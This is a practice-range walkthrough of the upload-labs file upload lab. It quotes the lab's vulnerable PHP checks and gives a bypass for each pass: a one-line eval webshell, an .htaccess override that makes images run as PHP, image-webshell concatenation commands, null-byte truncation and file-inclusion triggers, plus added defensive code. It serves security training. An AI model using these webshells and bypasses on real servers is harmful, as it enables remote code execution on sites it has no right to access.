upload-labs File Upload Vulnerability Range Practice

news2024/7/4 5:45:32

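Download link for upload-labs, the arbitrary file upload practice range

Contents

      • Pass-01 - Front-end JS validation bypass
      • Pass-02 - MIME type bypass
      • Pass-03 - File extension blacklist bypass
      • Pass-04 - .htaccess bypass
      • Pass-05 - Uppercase extension bypass
      • Pass-06 - Trailing-space extension bypass
      • Pass-07 - Trailing-dot extension bypass
      • Pass-08 - ::$DATA extension bypass
      • Pass-09 - Extension concatenation bypass
      • Pass-10 - Doubled-extension bypass
      • Pass-11 - GET-based 00 truncation
      • Pass-12 - POST-based 00 truncation
      • Pass-13 - File header content bypass
      • Pass-14 - getimagesize() check bypass
      • Pass-15 - exif_imagetype() check bypass
      • Pass-16 - Secondary rendering bypass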

Pass-01 - Front-end JS validation bypass

Try uploading a one-line webshell:

<?php @eval($_REQUEST[6868])?>

Code audit:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // Allowed upload file types
    var allow_ext = ".jpg|.png|.gif";
    // Extract the extension of the selected file
    var ext_name = file.substring(file.lastIndexOf("."));
    // Check whether the extension is allowed
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

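This is a whitelist policy: only files with a .jpg, .png or .gif extension are allowed.

Bypass method:

Front-end validation is worthless: delete the JS validation hook onsubmit="return checkFile()" from the form.

Pass-02 - MIME type bypass

Code audit: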

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

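Bypass method:

File type bypass: the check only looks at $_FILES['upload_file']['type'], which is supplied by the client.

Modify the Content-Type of the upload in the request.

Pass-03 - File extension blacklist bypass

Code audit:

A blacklist policy is applied.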

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass method:

[screenshot]

Pass-04 - .htaccess bypass

Code audit:

A blacklist policy is applied.

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass method:

Upload a .htaccess file with the following content:

<FilesMatch "jpg">
Sethandler application/x-httpd-php 
</FilesMatch>

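The .htaccess file changes how files in the uploads directory are handled: any file whose name merely contains the string "jpg" is passed to the PHP interpreter.

Put simply, if a file is named 1.jpg and its content is phpinfo(), Apache will invoke the PHP interpreter to parse it.

Then upload 2.jpg with the following content: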

<?php phpinfo();?>

Check the upload path http://192.168.80.139/upload/2.jpg

The PHP code inside the image is executed when it is accessed.

Pass-05 - Uppercase extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

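Compared with the previous pass, .htaccess has also been added to the blacklist.

However, the extension is still not converted to lowercase.

Bypass method:

Change the extension of the uploaded webshell file to uppercase:

rename 1.php to 1.PHP

Upload the file and check its path.

Visit http://192.168.80.139/upload/202308301506064212.PHP in the address bar.

No error means the upload succeeded.

At this point AntSword can be used to connect.

Open the directory manager.

Pass-06 - Trailing-space extension bypass

Code audit:

The code is missing trim($file_ext), the call that removes whitespace from both ends of the string.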

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass method:

[screenshot]

Pass-07 - Trailing-dot extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The deldot() call is missing:

$file_name = deldot($file_name); // remove trailing dots from the file name

Bypass method:

Add a . after the file extension.

Pass-08 - ::$DATA extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

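Compared with the earlier passes, this line is missing:

$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA

On Windows, if "::$DATA" is appended to a file name, everything after ::$DATA is treated as a file stream, the extension is not checked, and the file name before ::$DATA is kept. The whole point is that the extension check is skipped.

Bypass method:

Append ::$DATA to the name of the uploaded file, so that the extension of the uploaded file is no longer checked.

Pass-09 - Extension concatenation bypass

Code audit: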

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

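The code first trims whitespace around the file name, then removes the trailing . from the file name, then uses strrchr() to find the last . and determine the extension. When saving, however, it does not rename the file and uses the original file name, so 1.php. . (dot + space + dot) can be used as a bypass.

Bypass method:

Upload 1.php, intercept the request in Burp Suite and change the file name to 1.php. .

With ". .", one dot is removed first, then the ends are trimmed, and the file name still ends with a dot.

Pass-10 - Doubled-extension bypass

Code audit: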

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

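After filtering the file name, the code appends it directly to the path, so the trimming and dot removal from the earlier passes need to be bypassed. str_ireplace() removes each blacklisted string in a single pass and does not re-scan the result.

Bypass method:

Change the extension of the uploaded file so that it is doubled: 1.pphphp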
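The blacklist variants in Pass-03 to Pass-10 each miss one normalization step; a server-side allowlist combined with a server-generated file name removes the whole class. The following is an added example, not upload-labs code or the author's: ALLOWED_EXT and safe_upload_name() are hypothetical names, and the sample file names are constructed from the cases above.

```php
<?php
// Added example, not upload-labs code. ALLOWED_EXT and safe_upload_name()
// are hypothetical names chosen for this illustration.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Return a server-generated file name for an upload, or null if the
 * client-supplied name does not end in an allowlisted extension.
 */
function safe_upload_name(string $clientName): ?string
{
    // Reject control bytes (including NUL), path separators and the NTFS
    // stream separator ':' outright instead of trying to strip them.
    if ($clientName === '' || preg_match('/[\x00-\x1f\/\\\\:]/', $clientName)) {
        return null;
    }
    // Only the text after the last dot is considered, compared
    // case-insensitively against the allowlist. Nothing is trimmed or
    // "repaired": a name that would need fixing is refused.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // The stored name contains no client-chosen characters at all.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names: the variants used in Pass-03 to Pass-10,
// plus two names that end in an allowlisted extension.
$samples = [
    'photo.JPG', '1.php', '1.PHP', '1.php ', '1.php.', '1.php::$DATA',
    '1.php. .', '1.pphphp', '.htaccess', '1.php.jpg',
];
foreach ($samples as $name) {
    $stored = safe_upload_name($name);
    printf("%-16s => %s\n", json_encode($name), $stored ?? 'rejected');
}
```

Only photo.JPG and 1.php.jpg are accepted, and both are stored under a random name ending in .jpg, so nothing from the client-chosen name reaches the file system.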

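Pass-11 - GET-based 00 truncation

How 00 truncation works:

0x00 is hexadecimal notation for the character with ASCII code 0. Some functions treat this character as a terminator when processing strings.

When the system reads a file name and encounters 0x00, it considers the read finished.

00 truncation can therefore be used to bypass the corresponding whitelist validation:

1.php0x00.jpg

Code audit: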

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

This is whitelist filtering: only files with a jpg, png or gif extension are allowed.

Content submitted via GET is URL-decoded automatically.

Bypass method:

Upload 2.jpg whose content is <?php phpinfo();?>

The image uploads successfully. Right-click and copy the image link.

The address contains garbled characters.

Remove the part after 2.php and visit the URL to reach the PHP probe page.

Pass-12 - POST-based 00 truncation

Code audit:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

The same whitelist policy is used; the difference from the previous pass is that this time the path comes from $_POST.

In a POST request, %00 is not decoded automatically, so the byte has to be changed to 00 in the hex view.

Bypass method:

[screenshots]

After making the change, click Forward to release the request. The upload succeeds.

Copy the image link:

http://127.0.0.1/upload/2.php%EF%BF%BD/7520230830195703.jpg

Remove the extra part at the end:

http://127.0.0.1/upload/2.php
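Pass-11 and Pass-12 both build the destination from a client-supplied save_path. The following added example (not upload-labs code) shows one way to constrain such a value on the server; UPLOAD_BASE, resolve_save_dir() and the demo directory are hypothetical, and the inputs are constructed. PHP 5.3.4 and later also refuse paths containing NUL bytes in filesystem functions, but the value should still be validated rather than trusted.

```php
<?php
// Added example, not upload-labs code. UPLOAD_BASE and resolve_save_dir()
// are hypothetical names; the base path is a placeholder.
const UPLOAD_BASE = '/var/www/app/upload';

/**
 * Map a client-supplied sub-directory (the role save_path plays in
 * Pass-11 and Pass-12) to a directory under the base, or return null.
 */
function resolve_save_dir(string $requested, string $base = UPLOAD_BASE): ?string
{
    // A NUL byte, raw or already URL-decoded, has no place in a path.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Short allowlisted character set only: no dots or slashes, so the
    // value cannot carry a file name such as "2.php" or a "../" hop.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    // The directory must already exist and, with symlinks resolved,
    // must sit directly under the base directory.
    $baseReal = realpath($base);
    $dirReal  = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($baseReal === false || $dirReal === false
        || dirname($dirReal) !== $baseReal || !is_dir($dirReal)) {
        return null;
    }
    return $dirReal;
}

// Constructed demo: a temporary base directory with one valid sub-directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'upload_demo_' . bin2hex(random_bytes(4));
mkdir($base . DIRECTORY_SEPARATOR . 'avatars', 0700, true);

// Constructed inputs: one valid name and four that must be refused.
$inputs = ['avatars', "2.php\0", '2.php', '../avatars', 'missing'];
foreach ($inputs as $in) {
    $dir = resolve_save_dir($in, $base);
    printf("%-14s => %s\n", json_encode($in), $dir === null ? 'rejected' : 'accepted');
}

rmdir($base . DIRECTORY_SEPARATOR . 'avatars');
rmdir($base);
```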

Pass-13 - File header content bypass

Code audit:

[screenshot]

Bypass method:

Content of shell.php:

<?php @eval($_REQUEST[6868])?>

Making an image webshell:

Windows:
	copy 1.jpg /b + 1.php /a 2.jpg
Linux:
	cat 1.jpg shell.php > shell.jpg

The image uploads successfully.

Check the upload path.

The image's upload path is /upload/6720230830201732.jpg

Execute the image webshell by combining it with a file inclusion vulnerability:

http://127.0.0.1/include.php?file=./upload/6720230830201732.jpg

Connect with AntSword.

Pass-14 - getimagesize() check bypass

Code audit:

[screenshot]

The getimagesize() function checks the header of the file content.

Bypass method:

1. Image webshell

2. Upload the PHP webshell and modify the file content

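The image's upload path is upload/1820230830203805.gif

Triggering the webshell requires combining it with file inclusion:

http://127.0.0.1/include.php?file=./upload/1820230830203805.gif

Connect with AntSword.

Pass-15 - exif_imagetype() check bypass

Code audit:

[screenshot]

exif_imagetype: determines the type of an image, that is, whether the file is an image file

Bypass method:

Generate an image webshell to pass the function's check, then use the file inclusion vulnerability to connect to the webshell.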

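Pass-16 - Secondary rendering bypass

This PHP code allows image uploads but re-renders the image, so the re-rendering has to be bypassed: the PHP webshell code needs to be placed in a part of the image that re-rendering does not change.

Once move_uploaded_file is satisfied, the upload succeeds.

Bypass method:

First upload an ordinary jpg image, then save the resulting image; at this point the image has already been rendered.

Then use the rendered image to make an image webshell:

copy 20728.jpg /b +shell.php /a webshell.jpg

Upload the image and check its path.

Use file inclusion: http://127.0.0.1/include.php?file=upload/11907.jpg

Connecting with AntSword turns out not to work.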
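The header checks in Pass-13 to Pass-15 only confirm that a file starts like an image, while the re-rendering in Pass-16 rewrites the pixel data, which is why a file with data simply appended stops working there. The following added example (not upload-labs code) shows the difference on a constructed sample with a harmless marker string; reencode_image() is a hypothetical helper, and the fileinfo and GD extensions are assumed to be loaded.

```php
<?php
// Added example, not upload-labs code. Requires the fileinfo and GD
// extensions. reencode_image() is a hypothetical helper name.

/**
 * Decode the uploaded bytes as an image and re-encode the pixels as PNG.
 * Returns the new PNG bytes, or null if the data is not a decodable image.
 */
function reencode_image(string $bytes): ?string
{
    // The type is detected from the content on the server, never taken
    // from the Content-Type the client sent (the Pass-02 mistake).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        return null;
    }
    // A matching header is not enough: the whole image must decode.
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return null;
    }
    // Only the decoded pixel data is written back out.
    ob_start();
    imagepng($img);
    return ob_get_clean();
}

// Constructed sample: a 2x2 PNG generated in memory, with a harmless
// marker appended the same way `cat 1.jpg shell.php` appends a file.
$canvas = imagecreatetruecolor(2, 2);
ob_start();
imagepng($canvas);
$png    = ob_get_clean();
$marker = 'APPENDED-MARKER';
$upload = $png . $marker;

$mime  = (new finfo(FILEINFO_MIME_TYPE))->buffer($upload);
$size  = getimagesizefromstring($upload);
$clean = reencode_image($upload);

printf("finfo type:             %s\n", $mime);
printf("getimagesize passes:    %s\n", $size !== false ? 'yes' : 'no');
printf("marker in upload:       %s\n", strpos($upload, $marker) !== false ? 'yes' : 'no');
printf("marker after re-encode: %s\n", strpos((string) $clean, $marker) !== false ? 'yes' : 'no');
printf("plain text accepted:    %s\n", reencode_image('not an image') === null ? 'no' : 'yes');
```

As Pass-16 notes, data placed in parts that rendering leaves unchanged can survive, so re-encoding complements, and does not replace, keeping uploaded files out of include() and out of directories where PHP is executed.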

To be continued...
